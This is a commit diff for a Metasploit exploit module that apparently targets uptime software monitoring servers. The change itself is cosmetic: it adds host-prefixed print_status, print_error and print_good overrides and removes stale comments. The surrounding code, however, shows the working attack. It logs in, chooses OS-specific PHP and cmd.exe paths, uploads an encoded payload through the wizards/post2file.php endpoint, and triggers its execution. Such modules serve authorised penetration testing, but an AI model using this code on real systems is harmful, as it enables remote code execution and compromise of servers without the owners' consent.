Change print_*
wchen-r7
parent
3c961f61a7
commit
01c2641c6b
|
|
@ -54,6 +54,18 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
super("#{rhost}:#{rport} - #{msg}")
|
||||
end
|
||||
|
||||
def print_error(msg='')
|
||||
super("#{rhost}:#{rport} - #{msg}")
|
||||
end
|
||||
|
||||
def print_good(msg='')
|
||||
super("#{rhost}:#{rport} - #{msg}")
|
||||
end
|
||||
|
||||
# Application Check
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
|
|
@ -170,7 +182,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
vprint_status('Trying to login...')
|
||||
# #Application Login
|
||||
# Application Login
|
||||
res_auth = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
|
@ -179,13 +191,13 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
|
||||
# #Check OS #
|
||||
# Check OS
|
||||
phpfile_name = rand_text_alpha(10)
|
||||
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
||||
vprint_status('Found Linux installation - Setting appropriated PATH')
|
||||
phppath = '/usr/local/uptime/apache/bin/php'
|
||||
uploadpath = '/usr/local/uptime/GUI/wizards'
|
||||
## cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
||||
|
||||
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
|
||||
cmd = phppath
|
||||
else
|
||||
|
|
@ -193,7 +205,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
|
||||
cmd = 'c:\\windows\\system32\\cmd.exe'
|
||||
## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
||||
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
|
||||
end
|
||||
|
||||
|
|
@ -294,7 +305,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
|
||||
'vars_post' => {
|
||||
## 'file_name' => phpfile_name + '.txt',
|
||||
'file_name' => "#{phpfile_name}.txt",
|
||||
'script' => payload.encoded
|
||||
}
|
||||
|
|
@ -312,7 +322,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
print_error('File not found')
|
||||
end
|
||||
|
||||
# #Get Monitor ID
|
||||
# Get Monitor ID
|
||||
|
||||
vprint_status('Fetching Monitor ID...')
|
||||
res_mon_id = send_request_cgi(
|
||||
|
|
@ -343,7 +353,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
else
|
||||
print_error("#{peer} - Cookie not found")
|
||||
print_error('Cookie not found')
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue